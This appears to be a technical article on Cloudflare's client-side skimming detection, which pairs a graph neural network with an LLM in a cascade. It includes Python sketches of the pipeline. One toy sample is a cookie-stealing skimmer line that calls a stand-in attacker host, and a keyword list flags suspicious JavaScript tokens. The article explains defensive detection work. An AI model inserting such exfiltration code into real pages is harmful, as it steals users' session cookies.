This article describes Cloudflare's Client-Side Security product and its architecture for detecting client-side skimming and malicious JavaScript. It highlights a two-stage detection pipeline that pairs a Graph Neural Network (GNN), used for high recall, with a Large Language Model (LLM) that sharply reduces false positives at scale. The system processes billions of scripts daily, and the write-up offers lessons on distributed security, AI/ML integration in production, and large-scale data processing for threat detection.
Client-side skimming attacks, often involving malicious JavaScript injection, pose a significant threat because they can operate stealthily without disrupting the user experience. Detecting these threats at Cloudflare's scale, which means assessing 3.5 billion scripts daily across thousands of enterprise zones, is a massive data and computational problem. The sheer volume and high volatility of JavaScript code (roughly a third of scripts update monthly) make manual review impossible and traditional signature-based detection insufficient for zero-day threats. The system needs to distinguish malicious intent from code that is benign but complex or obfuscated, a task complicated by severe class imbalance: benign scripts are vastly more numerous and more varied than the known malicious samples.
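To make the scale and class-imbalance points concrete, the back-of-the-envelope sketch below converts 3.5 billion scripts per day into an average per-second rate and shows how a rare malicious class drags down alert precision. Only the daily volume comes from the article; the prevalence, recall, and false positive rate are invented for illustration and are not Cloudflare figures.

```python
# Back-of-the-envelope arithmetic. Only SCRIPTS_PER_DAY is taken from the
# article; every other number below is a hypothetical assumption.
SCRIPTS_PER_DAY = 3_500_000_000
SECONDS_PER_DAY = 24 * 60 * 60


def average_rate_per_second(per_day: int) -> float:
    """Average number of scripts to assess each second."""
    return per_day / SECONDS_PER_DAY


def alert_precision(prevalence: float, recall: float, false_positive_rate: float) -> float:
    """Fraction of alerts that are truly malicious (Bayes' rule)."""
    true_positives = prevalence * recall
    false_positives = (1.0 - prevalence) * false_positive_rate
    return true_positives / (true_positives + false_positives)


# Roughly 40,500 scripts per second on average.
avg_rate = average_rate_per_second(SCRIPTS_PER_DAY)

# Hypothetical single-stage detector: 1 malicious script per million,
# 99% recall, 0.1% false positive rate.
single_stage_precision = alert_precision(
    prevalence=1e-6, recall=0.99, false_positive_rate=1e-3
)

# Expected false alerts per day under the same hypothetical rates.
false_alerts_per_day = SCRIPTS_PER_DAY * (1 - 1e-6) * 1e-3

print(f"average rate: {avg_rate:,.0f} scripts/s")
print(f"precision: {single_stage_precision:.4%}")
print(f"false alerts/day: {false_alerts_per_day:,.0f}")
```

Under these assumed rates, only about one alert in a thousand would be a real threat, which is why a detector that looks accurate in isolation can still flood customers with false positives at this volume.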
Cloudflare's solution is a cascading classifier that combines a Graph Neural Network (GNN) with a Large Language Model (LLM): the GNN screens scripts with high recall so that new threats are caught, and the LLM refines the result to keep the false positive rate extremely low. Low false positives matter because they let the product stay effective without overwhelming customers with alerts. The system collects signals using browser reporting (e.g., Content Security Policy) without requiring app instrumentation or adding latency.
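As a rough illustration of the browser-reporting idea, the sketch below builds a report-only Content Security Policy header and extracts the script URL from a standard CSP violation report. The policy string, the endpoint URL, and the helper names `report_only_header` and `script_url_from_report` are assumptions made for this example; the article does not state which policy Cloudflare actually sends.

```python
import json
from typing import Optional, Tuple


def report_only_header(report_endpoint: str) -> Tuple[str, str]:
    """Build a report-only CSP header (hypothetical policy).

    In report-only mode the browser blocks nothing; it only posts a
    violation report for each script that the policy would have blocked.
    """
    policy = f"script-src 'none'; report-uri {report_endpoint}"
    return ("Content-Security-Policy-Report-Only", policy)


def script_url_from_report(body: str) -> Optional[str]:
    """Return the reported script URL, or None for non-script violations."""
    report = json.loads(body).get("csp-report", {})
    directive = report.get("effective-directive") or report.get("violated-directive") or ""
    if not directive.startswith("script-src"):
        return None
    return report.get("blocked-uri")


# Example report body in the shape browsers send to a report-uri endpoint.
sample_report = json.dumps({
    "csp-report": {
        "document-uri": "https://shop.example/checkout",
        "effective-directive": "script-src-elem",
        "blocked-uri": "https://cdn.example/checkout.js",
    }
})

header_name, header_value = report_only_header("https://reports.example/csp")
seen_script = script_url_from_report(sample_report)
print(header_name, "->", header_value)
print("script observed:", seen_script)
```

Because the reports are produced by the visitor's browser and sent out of band, this style of collection needs no changes to application code and does not sit in the page's request path.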
Architectural Lesson: Hybrid AI for Scale and Accuracy
This Cloudflare architecture demonstrates a powerful pattern for integrating AI in production: combining a specialized, high-recall model (GNN) for initial screening with a more general, high-precision model (LLM) for refinement. This hybrid approach optimizes both performance (most traffic bypasses the LLM) and accuracy, effectively tackling the class imbalance problem inherent in anomaly detection at massive scale. Leveraging existing infrastructure like Workers AI and R2 for ML inference and logging further exemplifies efficient resource utilization in a distributed system.
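The cascade pattern described above can be sketched in a few lines. This is a minimal illustration, not Cloudflare's implementation: `toy_screen` and `toy_verify` are hypothetical keyword-based stand-ins for the GNN and the LLM, and the threshold of 0.25 is an arbitrary assumption.

```python
from dataclasses import dataclass
from typing import Callable, Iterable, Iterator, Tuple


@dataclass
class Verdict:
    script_id: str
    malicious: bool
    stage: str  # which stage produced the final decision


def cascade(
    scripts: Iterable[Tuple[str, str]],
    screen: Callable[[str], float],
    verify: Callable[[str], bool],
    threshold: float,
) -> Iterator[Verdict]:
    """Run the cheap screen on everything; call the costly verifier only on flagged scripts."""
    for script_id, source in scripts:
        if screen(source) < threshold:
            # Most traffic ends here and never reaches the second stage.
            yield Verdict(script_id, False, "stage1")
        else:
            yield Verdict(script_id, verify(source), "stage2")


SUSPICIOUS = ("eval(", "atob(", "fetch(", "document.cookie")


def toy_screen(source: str) -> float:
    """Hypothetical stand-in for the high-recall model: fraction of suspicious tokens present."""
    return sum(token in source for token in SUSPICIOUS) / len(SUSPICIOUS)


def toy_verify(source: str) -> bool:
    """Hypothetical stand-in for the high-precision model: reads a cookie and sends it out."""
    return "document.cookie" in source and "fetch(" in source


samples = [
    ("plain", "console.log('hi')"),
    ("obfuscated", "eval(atob('Y29uc29sZS5sb2coMSk='))"),
    ("skimmer", "fetch('https://evil.example/c?d=' + document.cookie)"),
]

verdicts = list(cascade(samples, toy_screen, toy_verify, threshold=0.25))
bypassed = sum(v.stage == "stage1" for v in verdicts)
for v in verdicts:
    print(v)
print(f"{bypassed} of {len(verdicts)} scripts bypassed the second stage")
```

In this toy run the obfuscated but harmless script is flagged by the first stage and then cleared by the second, which is the false positive reduction the cascade is meant to provide, while the plain script never incurs the cost of the second stage.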